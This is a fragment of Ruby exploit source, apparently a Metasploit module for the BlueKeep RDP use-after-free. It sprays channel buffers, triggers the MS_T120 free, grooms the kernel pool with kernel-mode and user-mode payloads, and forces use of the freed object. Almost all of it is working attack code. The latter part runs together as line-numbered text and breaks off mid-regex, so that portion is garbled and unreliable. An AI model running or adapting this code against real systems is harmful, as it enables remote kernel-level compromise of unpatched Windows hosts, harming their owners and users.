    # The first groom channel is registered immediately after rdpdr in exploit.
    target_channel_id = chan_id + 1

    spray_buffer = create_exploit_channel_buffer(pool_addr)
    spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)
    # The MS_T120 free is sandwiched between spray messages so that one of
    # them lands in the freshly freed allocation.
    free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80

    print_status("Surfing channels ...")
    rdp_send(spray_channel * 1024)
    rdp_send(free_trigger)

    # Follow-up spray after the free. chan_surf_size drives both how many
    # spray messages are packed per send and how many sends are made; the
    # arithmetic is inherited from the original exploit and not re-derived here.
    chan_surf_size = 0x421
    spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min
    chan_surf_packet = spray_channel * spray_packets
    chan_surf_count = chan_surf_size / spray_packets

    chan_surf_count.times do
      rdp_send(chan_surf_packet)
    end

    print_status("Lobbing eggs ...")

    # Each iteration sends every payload (one chunk of roughly CHUNK_SIZE,
    # i.e. about 1 KiB) on each groomed channel, so groom_mb iterations push
    # on the order of GROOMSIZE MiB per channel into the pool.
    groom_mb = groom_size * 1024 / payloads.length

    groom_mb.times do
      tpkts = ''
      # Inclusive range: GROOMCHANNELCOUNT + 1 channels from target_channel_id
      # onward, which with the default of 1 covers both GROOMCHANNEL entries
      # registered in exploit. Larger values spill onto the MS_XXXn filler
      # channels — presumably intended, not verified here.
      for c in 0..groom_chan_count
        payloads.each do |p|
          tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF)
        end
      end
      rdp_send(tpkts)
    end

    # Terminating and disconnecting forces the USE
    print_status("Forcing the USE of FREE'd object ...")
    rdp_terminate
    rdp_disconnect
  end

  # Helper function to create the kernel mode payload and the usermode payload with
  # the egg hunter prefix.
272 | def create_payloads(pool_address) 273 | begin 274 | [kernel_mode_payload, user_mode_payload].map { |p| 275 | [ 276 | pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg 277 | p 278 | ].pack(' ex 281 | print_error("#{ex.backtrace.join("\n")}: #{ex.message} (#{ex.class})") 282 | end 283 | end 284 | 285 | def assemble_with_fixups(asm) 286 | # Rewrite all instructions of form 'lea reg, [rel label]' as relative 287 | # offsets for the instruction pointer, since metasm's 'ModRM' parser does 288 | # not grok that syntax. 289 | lea_rel = /lea+\s(?\w{2,3}),*\s\[rel+\s(?